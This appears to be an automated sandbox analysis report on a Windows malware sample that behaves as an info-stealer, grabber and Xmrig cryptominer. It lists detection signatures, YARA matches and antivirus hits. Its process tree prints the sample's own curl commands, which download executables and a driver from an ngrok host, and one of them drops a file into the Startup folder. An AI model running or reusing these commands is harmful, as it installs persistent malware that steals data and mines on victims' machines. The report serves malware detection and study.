Edit tour
Windows
Analysis Report
RnT6mMyI7d
Overview
General Information
Detection
Hog Grabber ItroublveBOT Stealer Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Yara detected ItroublveBOT Stealer
Yara detected MultiObfuscated
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected Hog Grabber
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Drops PE files to the startup folder
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sample is not signed and drops a device driver
Machine Learning detection for sample
Yara detected Beds Obfuscator
May check the online IP address of the machine
Yara detected BrowsingHistoryView browser history reader tool
Yara detected WebBrowserPassView password recovery tool
Opens the same file many times (likely Sandbox evasion)
PE file has nameless sections
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
PE file contains section with special chars
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains strange resources
Drops PE files
Creates driver files
Creates a start menu entry (Start Menu\Programs\Startup)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- RnT6mMyI7d.exe (PID: 6388 cmdline:
"C:\Users\ user\Deskt op\RnT6mMy I7d.exe" MD5: 79EEBC8D29210D70CFBEA7E39899B68F) - cmd.exe (PID: 6496 cmdline:
C:\Windows \system32\ cmd.exe" / c "C:\User s\user\App Data\Local \Temp\54A5 .tmp\54A6. tmp\54A7.b at C:\User s\user\Des ktop\RnT6m MyI7d.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - curl.exe (PID: 6548 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/config .json --ou tput C:\Us ers\user~1 \AppData\L ocal\Temp\ \02FD7D73- 3576--F-G5 FAD-E602\\ config.jso n --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 6620 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/SHA256 SUMS --out put C:\Use rs\user~1\ AppData\Lo cal\Temp\\ 02FD7D73-3 576--F-G5F AD-E602\\S HA256SUMS --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 6692 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/Window smenager.e xe --outpu t C:\Users \user~1\Ap pData\Loca l\Temp\\02 FD7D73-357 6--F-G5FAD -E602\\Win dowsmenage r.exe --si lent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 6984 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/WinRin g0x64.sys --output C :\Users\us er~1\AppDa ta\Local\T emp\\02FD7 D73-3576-- F-G5FAD-E6 02\\WinRin g0x64.sys --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 5976 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/Micros oft_Window s.exe --ou tput C:\Us ers\user~1 \AppData\L ocal\Temp\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\M icrosoft_W indows.exe --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 6156 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/x64Hid er.exe --o utput C:\U sers\user~ 1\AppData\ Local\Temp \\02FD7D73 -3576--F-G 5FAD-E602\ \02FD7D73- 3576--F-G5 FAD-E602\\ x64Hider.e xe --silen t MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 4644 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/Micros oft_Window s.exe --ou tput C:\Us ers\user~1 \AppData\L ocal\Temp\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\0 2FD7D73-35 76--F-G5FA D-E602\\Mi crosoft_Wi ndows.exe --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 5728 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/x64Hid er.exe --o utput C:\U sers\user~ 1\AppData\ Local\Temp \\02FD7D73 -3576--F-G 5FAD-E602\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\x 64Hider.ex e --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 6864 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/Micros oft_Window s.exe --ou tput C:\Us ers\user~1 \AppData\L ocal\Temp\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\0 2FD7D73-35 76--F-G5FA D-E602\\02 FD7D73-357 6--F-G5FAD -E602\\Mic rosoft_Win dows.exe - -silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 5272 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/x64Hid er.exe --o utput C:\U sers\user~ 1\AppData\ Local\Temp \\02FD7D73 -3576--F-G 5FAD-E602\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\0 2FD7D73-35 76--F-G5FA D-E602\\x6 4Hider.exe --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 6700 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/Micros oft_Window s.exe --ou tput C:\Us ers\user~1 \AppData\L ocal\Temp\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\0 2FD7D73-35 76--F-G5FA D-E602\\02 FD7D73-357 6--F-G5FAD -E602\\02F D7D73-3576 --F-G5FAD- E602\\Micr osoft_Wind ows.exe -- silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 4520 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/x64Hid er.exe --o utput C:\U sers\user~ 1\AppData\ Local\Temp \\02FD7D73 -3576--F-G 5FAD-E602\ \02FD7D73- 3576--F-G5 FAD-E602\\ 02FD7D73-3 576--F-G5F AD-E602\\0 2FD7D73-35 76--F-G5FA D-E602\\02 FD7D73-357 6--F-G5FAD -E602\\x64 Hider.exe --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - curl.exe (PID: 4484 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/Menage r.exe --ou tput C:\Us ers\user~1 \AppData\L ocal\Temp\ \02FD7D73- 3576--F-G5 FAD-E602\\ Menager.ex e --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - Menager.exe (PID: 6960 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\\02FD 7D73-3576- -F-G5FAD-E 602\\Menag er.exe MD5: 1A300FDB8E112583C2A4012B2A6A5E83) - cmd.exe (PID: 7016 cmdline:
C:\Windows \system32\ cmd.exe" / c "C:\User s\user\App Data\Local \Temp\D56. tmp\D57.tm p\D58.bat C:\Users\u ser~1\AppD ata\Local\ Temp\02FD7 D73-3576-- F-G5FAD-E6 02\Menager .exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - timeout.exe (PID: 3588 cmdline:
timeout 18 0 MD5: EB9A65078396FB5D4E3813BB9198CB18) - curl.exe (PID: 6932 cmdline:
curl 6ce0- 2001-1bb0- e000-1e-00 -c3c.ngrok .io/aa.exe --output C:\Users\u ser\AppDat a\Roaming\ \Microsoft \\Windows\ \"Start Me nu"\\Progr ams\\Start up\\aa.exe --silent MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - aa.exe (PID: 6204 cmdline:
"C:\Users\ user\AppDa ta\Roaming \\Microsof t\\Windows \\Start Me nu\\Progra ms\\Startu p\\aa.exe" MD5: 57C5DDFBBE204B37A7CA92DE5468008A) - RtkBtManServ.exe (PID: 6340 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\RtkBtM anServ.exe " ZhXl39Bl hP84+Y4kur A8wpehxxqA 0X22IMYZ6V piqs5kR6z6 ZL2ea1HDBD 1Yg08p4nF5 5LoajPMo7A r4qiVlPNT+ XVdGBhY3aV //wO0FJeiz V/JaX+6h1I DbP9uJPBJV S1bBIIRJQG GfOPBe3pbo 7aLWGnhx2c VdZNLNZPmP CaA= MD5: 88AB0BB59B0B20816A833BA91C1606D3)
- aa.exe (PID: 5728 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\aa. exe" MD5: 57C5DDFBBE204B37A7CA92DE5468008A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth |
| |
ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth |
| |
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth |
| |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
Click to see the 16 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_ItroublveBOTStealer | Yara detected ItroublveBOT Stealer | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 32 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_NET_NAME_ConfuserEx | Detects ConfuserEx packed file | Arnim Rupp |
| |
JoeSecurity_BedsObfuscator | Yara detected Beds Obfuscator | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_HogGrabber | Yara detected Hog Grabber | Joe Security | ||
JoeSecurity_MultiObfuscated | Yara detected MultiObfuscated | Joe Security | ||
Click to see the 52 entries |
System Summary |
---|
Source: | Author: James Pemberton / @4A616D6573: |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |